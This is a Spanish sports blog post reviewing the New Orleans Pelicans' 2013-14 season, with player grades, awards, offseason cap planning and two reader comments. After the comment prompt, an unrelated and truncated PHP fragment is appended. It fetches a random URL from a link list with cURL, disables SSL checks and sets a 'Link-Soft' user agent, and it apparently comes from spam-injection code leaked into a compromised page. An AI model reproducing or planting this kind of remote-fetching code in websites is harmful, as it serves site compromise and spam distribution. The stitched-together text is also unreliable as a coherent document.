New Orleans Pelicans: Suficiente

04 de July de 2014 por TheDeerHunter

123013-SW-NBA-Tyreke-Evans-PI

Por los pelos, en el límite del bien y del mal. Atendiendo a la previsión que hicimos a principio de curso los Pelicans han cumplido con precisión. Les pedíamos 35 victorias y han firmado 34 en la división más competitiva de la liga con el mérito añadido de mantener el 50% de victorias en el Oeste durante los 2 primeros meses de competición. Quizá precisamente por eso, por las expectativas revisadas al alza, el resultado final se nos antoja algo discreto. El hecho de aparecer en el tercio inferior de la liga en todas las categorías estadísticas a pesar de haber disfrutado de un año tan fabuloso de Anthony Davis podría habernos hecho decantar por el suspenso.

Lo cierto es que el historial de incidencias es todo un poema: Ryan Anderson 22 partidos jugados, Jason Smith 31, Jrue Holiday 34, Greg Stiemsma 55, ni Davis ni Gordon han llegado a los 70 y sólo Aminu ha podido disputar 80. De todas maneras no podemos achacárselo todo a la mala suerte porque los antecedentes de problemas físicos de algunos eran conocidos y los riesgos asumidos en la propia confección de la plantilla. Curiosamente tanto Tyreke Evans como Eric Gordon han disfrutado de una campaña relativamente sana atendiendo a sus estándares. 

No hemos podido ver al equipo a pleno rendimiento pero sí a Anthony Davis en un temporadón antológico ya en su segundo año. Consolidado como indiscutible jugador franquicia y All Star, estuvo además a punto de ganar el premio de Most Improved Player con una producción comparable a los pesos pesados de la liga. Sólo otros 5 jugadores pueden resistir esos 20-10 de promedio y nadie más le añade casi 3 tapones más. Por su juventud, en un draft imaginario donde se planteara la confección de un proyecto ganador de cara a las próximas 5-10 campañas sería uno de los favoritos al número 1. Su única pega es que nuevamente se ha quedado estancado en 67 partidos tras haber disputado 64 la anterior. Es uno de los llamados a dominar la liga a medio plazo si su salud lo permite.

La otra buena noticia del curso ha sido Tyreke Evans. Llegó a la meca del jazz con un bien ganado cartel de bluff. Entre sus problemas físicos y su mentalidad poco ambiciosa su aportación ha ido paulatinamente descendiendo año a año desde su brillante temporada de Rookie of the year. Ha mantenido la tendencia a la baja pero así lo exigía el guión atendiendo al rol de sexto hombre que querían darle. No ha estado bien en el lanzamiento pero en un equipo con tantos problemas para dar la alineación cada noche, su versatilidad ha resultado vital. Ha concretado su juego a un papel ideal para sus características. Su capacidad para mover a sus compañeros ha regresado y ha sido el mejor asistente del equipo tras Holiday convirtiéndose en su sustituto sobre el papel. Con todo, tampoco se pudo librar de pasar por el quirófano.

Del resto de la plantilla exenta de lesiones sombras y luces. Al-Farouq Aminu se ha especializado casi exclusivamente en la defensa y su aportación en ataque es excesivamente residual para el titular de un equipo que pretende competir. Anthony Morrow ha cumplido, se ha revalorizado ligeramente y catará el mercado renunciando a su player option. Brian Roberts, Alexis Ajinca… no se les puede pedir mucho más pero tampoco disfrutarán de mejores ocasiones que las que han tenido para destacar. Nos quedamos con cierto regusto amargo sobre la evolución de Austin Rivers, que si bien ha dado señales de vida éramos más optimistas acerca de sus posibilidades este año.

Lo peor de todo es que tras los mediocres resultados no había una elección en primera ronda para el draft más interesante de los últimos años. Hasta el momento el riesgo asumido en la operación Holiday parece apuntar a doble catástrofe. Sólo el tiempo dirá si mereció la pena renunciar a esas dos primeras altas que probablemente les hubieran puesto en órbita. El base all-star aún deberá responder a esa cuestión. El envite no terminaba aquí pues recientemente los Pelicans han lanzado otro órdago de alto voltaje. El fichaje de Omer Asik a cambio de otra primera (protegida) del 2015. Hay lecturas para todo sobre esta operación. Los más de 15 millones que aún le restan por cobrar al turco les acerca peligrosamente al impuesto de lujo. Tampoco resultará fácil su renovación a final de este curso, teniendo en mente el máximo salarial que cobrará Davis de aquí a dos temporadas. A corto plazo, sin embargo, es una pieza ideal para hacer competir a los Pelicans el curso que viene, si la salud lo permite.

PREMIOS

MVP: Si mejora su fiabilidad física Anthony Davis apunta a jugador de calibre histórico, un “nuevo” Duncan en ciernes. Uno de los nombres propios de este curso, sin duda. Lástima que el equipo, de momento, no ha acompañado.

Rookie: Nos hablaron bien de Jeff Withey a principio de curso, incluso como futurible titular. Con muy poca competencia alrededor, alguna buena noche les ha dado. La tónica general, sin embargo, ha sido poco ilusionante. Demasiado intermitente.

Sorpresa: No esperábamos grandes cosas de Tyreke Evans a estas alturas pero ha logrado responder a la ambiciosa apuesta que hicieron los Pelicans por él. Se ha ganado el puesto en un equipo que tendrá que afrontar pronto objetivos mayores. Veremos si no es flor de un día.

Decepción: Esperábamos que este año Austin Rivers se consolidarara como jugador clave y como recurso ofensivo útil. En sus mocks alguno le llegó a comparar con Reggie Miller pero con un 40% raspado en el tiro eso suena a broma y a blasfemia. Por suerte ha ido de menos a más, con dos meses mucho más acordes a la idea que teníamos de él. Probablemente no será suficiente para continuar en el equipo.

Esfuerzo en vano: Al-Farouq Aminu fue elegido en el pick número 8 del 2010, por delante de Paul George, por ejemplo. Hoy en día es un especialista defensivo puro y duro que se encuentra en los puestos punteros de la lista de titulares que menos aro ven. Es de los pocos que se han librado de la enfermería este año y ha jugado mucho, sin embargo los Pelicans no tienen demasiadas opciones de plantearse una renovación.

JUGANDO A GM

La llegada de Asik los Pelicans afecta directamente la política de fichajes, comiéndose todo el margen de maniobra sin haber completado ni de lejos la plantilla. De entrada deben situarse por debajo del nuevo límite salarial (62 millones) antes del 10 Julio. Esto previsiblemente significa desprenderse de alguno de los eslabones más débiles (¿Austin Rivers?) y renunciar a cualquier puja por sus agentes libres. La lista de bajas es extensa: Al-Farouq Aminu, Jason Smith, Gregg Stiemsma, Anthony Morrow, Briant Roberts, Luke Babbitt, Darius Miller…  Habrá que hacer mucha alquimia este verano porque después tendrán escasa liquidez para fichar por encima del mínimo y aún deben reconstruir la segunda unidad prácticamente al completo.

Con el cartel de intransferible colgado en Ryan Anderson sólo existe otro camino evidente para lograr cierto respiro. Eric Gordon ha cumplido este año, pero no para cobrar sus 15 millones el próximo más la player option del verano que viene. En el actual contexto salarial resulta complicadísimo mover ese contrato y mucho menos recibiendo algo a cambio. De existir la posibilidad su salida debería de ser prioritaria y el jugador aún cuenta con cierto cartel. Su nombre suena en todas las quinielas pero creemos que lo más probable es que continúe en la plantilla.

El único movimiento evidente y que por sus características económicas llegará a buen puerto es la firma del rookie de segunda ronda Russ “Russdiculous” Smith (proveniente de los Sixers a cambio de Pierre Jackson) base tirador al que prácticamente están obligados a contratar para completar roster. Por su parte parece que también están interesados en Patric Young, un pívot muy físico que sonó en varios mocks de primera ronda pero terminó undrafted. James Sutherland volverá con ellos en las summer league y será candidato a quedarse con el puesto.

A partir de aquí, habrá que convencer a alguien para firmar por poco menos de 3 millones, o incluso repartirlos si se desean firmar un par de agentes libres. El punto de mira parece apuntar claramente a otro hombre de perímetro, PJ Tucker, siempre que otros equipos no encarezcan el producto. Se comenta que también han mostrado interés en Troy Daniels, pero es agente libre restringido. Lo suyo sería ir de cabeza a por James Anderson, que recientemente ha sido “liberado” por los Sixers y posiblemente no se irá mucho más allá del mínimo.

La plantilla para empezar a disputar playoffs se parece mucho a la actual en su columna vertebral, solo que más corta y con la misma predisposición a las lesiones. En el riesgo está el placer.

PG: Jrue Holiday, Russ Smith
SG: Eric Gordon, James Anderson
SF: Tyreke Evans,  P.J. Tucker,
PF: Anthony Davis, Ryan Anderson, Alexis Ajinca
C: Omer Asik, Jeff Withey,  Patric Young

Comenta

2 comentarios a esta entrada

  1. Vader dice:
    #1

    Si Melo renueva por los Knicks les enviaba un Bargiani (expiring)+Shumpert por Eric Gordon.

    Saludos

      Citar

  2. Esteban dice:
    #2

    sin margen para richar jugadores, pero mucho margen de mejora si sus jugadores estan sanos, un equipo con Holiday,gordon, aminu, davis y asik, y saliendo desde el banco, roberts, evans, anderson y smith debe ser de PO comodo o seria un fracaso absoluto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>